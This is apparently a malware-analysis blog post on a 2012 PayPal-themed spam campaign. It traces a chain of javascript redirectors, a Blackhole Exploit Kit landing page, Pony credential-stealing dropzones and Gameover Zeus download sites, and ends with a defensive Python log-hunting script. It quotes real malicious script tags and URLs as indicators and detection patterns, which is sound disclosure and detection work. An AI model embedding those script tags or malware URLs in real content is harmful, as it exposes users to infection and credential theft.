You sent a payment

The spam hits kept a rollin’ today. On 2012-04-02 we observed a PayPal-themed spam campaign.

The spam sample that we analyzed had a subject line of “You sent a payment.” This sample contained the following malicious links:

The malicious pages contained the following javascript redirectors:

<script type="text/javascript" src="http://hirochan.boo.jp/7PMiDL3p/js.js"></script>
<script type="text/javascript" src="http://renovation-nantes.com/NCAsBwpU/js.js"></script>
<script type="text/javascript" src="http://ncworld.in/bgGdzvBh/js.js"></script>

These scripts redirected victims to a Blackhole Exploit Kit landing page at http://50.56.223.113:8080/showthread.php?t=d7ad916d1c0396ff.

Note that we previously saw the IP 50.56.223.113 used as a dropzone for the Pony downloader variant in the attack documented in our post US Airways online check-in. This fits a pattern we’ve observed before, where the same IP hosts both a Blackhole Exploit Kit and a Pony downloader dropzone.

The Blackhole kit at 50.56.223.113 dropped a Pony downloader variant with the following properties:

File: info.exe
Size: 94761
MD5: C150FCEA73F3B2904BBEBE0E601B53AC

This Pony downloader variant was configured to send stolen FTP and web admin credentials to the following dropzones:

http://50.56.223.113:8080/pony/gate.php
http://91.121.178.156:8080/pony/gate.php

The Pony variant also downloaded a Gameover Zeus variant from the following locations:

http://haine-fashion.ro/bLXJU5o.exe
http://hermanosbrando.es/8xsfW5.exe
http://confeitariadossonhos.com.br/Wo4RUjB.exe

The Gameover variant had the following properties:

Size: 297512
MD5: 1E3AA9BCFB6300F426030532821525EA

This variant had a botid of “NRa3”. Note that the day counter in the botid had been incremented to 3. This is significant because we analyzed this sample at approximately 8pm EDT on 2012-04-02. That the botid had already been incremented to 3 suggests that the bot was compiled in and distributed from a different timezone … perhaps somewhere in Europe?
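The indicators above describe a repeatable chain (injected js.js redirector, Blackhole landing page on :8080, Pony check-in to /pony/gate.php, random-name .exe download from a compromised site), so the useful thing for a defender is to hunt for that sequence in proxy logs rather than for any single URL. The script below is an added example written for this post, not code from the original write-up. It uses the hosts and URL shapes listed above as an IOC set, generalises the URL shapes with regexes so the same kit layout on infrastructure not listed here is also flagged, and correlates hits per client so that only the landing-page-then-post-exploit sequence is reported as a likely infection. The log format (timestamp, client, method, URL, status) and all sample log lines are constructed for the example; the private-range client IPs and example.com/example.net hosts are not from the post.

```python
"""Hunt proxy logs for the Blackhole -> Pony -> Gameover chain described above."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Infrastructure named in the post, used here as a static IOC list.
KNOWN_HOSTS = {
    "hirochan.boo.jp": "js-redirector",
    "renovation-nantes.com": "js-redirector",
    "ncworld.in": "js-redirector",
    "50.56.223.113": "blackhole-landing/pony-gate",
    "91.121.178.156": "pony-gate",
    "haine-fashion.ro": "gameover-dropper",
    "hermanosbrando.es": "gameover-dropper",
    "confeitariadossonhos.com.br": "gameover-dropper",
}

# URL shapes generalised from the indicators above (assumption: the kit keeps
# this layout on other hosts). The .exe rule is deliberately loose and is only
# weak evidence on its own; it matters when it follows a landing-page hit.
URL_PATTERNS = [
    ("js-redirector", re.compile(r"^/[A-Za-z0-9]{8}/js\.js$")),
    ("blackhole-landing", re.compile(r"^/showthread\.php\?t=[0-9a-f]+$")),
    ("pony-gate", re.compile(r"^/pony/gate\.php$")),
    ("exe-dropper", re.compile(r"^/[A-Za-z0-9]{6,8}\.exe$")),
]

# Constructed sample proxy log: one full chain, one clean client, and one
# client that only touched a redirector-shaped URL on an unknown host.
SAMPLE_LOG = """\
2012-04-02T19:58:02 10.0.0.21 GET http://hirochan.boo.jp/7PMiDL3p/js.js 200
2012-04-02T19:58:03 10.0.0.21 GET http://50.56.223.113:8080/showthread.php?t=d7ad916d1c0396ff 200
2012-04-02T19:58:09 10.0.0.21 POST http://50.56.223.113:8080/pony/gate.php 200
2012-04-02T19:58:12 10.0.0.21 GET http://hermanosbrando.es/8xsfW5.exe 200
2012-04-02T19:59:40 10.0.0.37 GET http://www.example.com/index.html 200
2012-04-02T20:01:15 10.0.0.42 GET http://cdn.example.net/Ab12Cd34/js.js 200
""".splitlines()


def classify_url(url):
    """Return (tags, known_host): stage names matched by URL shape, and whether
    the host is on the IOC list from the post."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    path_q = parts.path + ("?" + parts.query if parts.query else "")
    tags = sorted(name for name, rx in URL_PATTERNS if rx.match(path_q))
    return tags, host in KNOWN_HOSTS


def scan_log(lines):
    """Parse 'ts client method url status' lines (constructed format) and return
    {client: [(ts, url, tags, known_host), ...]} for every line that matched
    a pattern or a known host, preserving log order."""
    hits = defaultdict(list)
    for line in lines:
        fields = line.split()
        if len(fields) < 5:
            continue  # malformed line; skip rather than guess
        ts, client, _method, url, _status = fields[:5]
        tags, known = classify_url(url)
        if tags or known:
            hits[client].append((ts, url, tags, known))
    return dict(hits)


def likely_infected(hits):
    """Clients that hit a Blackhole landing page and afterwards a Pony gate or
    a dropper download. A lone js.js or .exe match is not enough: the ordered
    landing -> post-exploit sequence is what the post describes."""
    infected = []
    for client, events in hits.items():
        landing_seen = False
        for _ts, _url, tags, _known in events:
            if "blackhole-landing" in tags:
                landing_seen = True
            elif landing_seen and ({"pony-gate", "exe-dropper"} & set(tags)):
                infected.append(client)
                break
    return sorted(infected)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for client, events in sorted(found.items()):
        for ts, url, tags, known in events:
            print(f"{ts} {client} {url} tags={tags} known_host={known}")
    print("likely infected:", likely_infected(found))
```

Running it against the constructed log reports 10.0.0.21 as likely infected, while 10.0.0.42 is surfaced only as a single low-confidence redirector hit worth a look, not an infection. Drop real proxy exports into `scan_log` in the same five-field shape, or adapt the field split to your proxy’s format.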
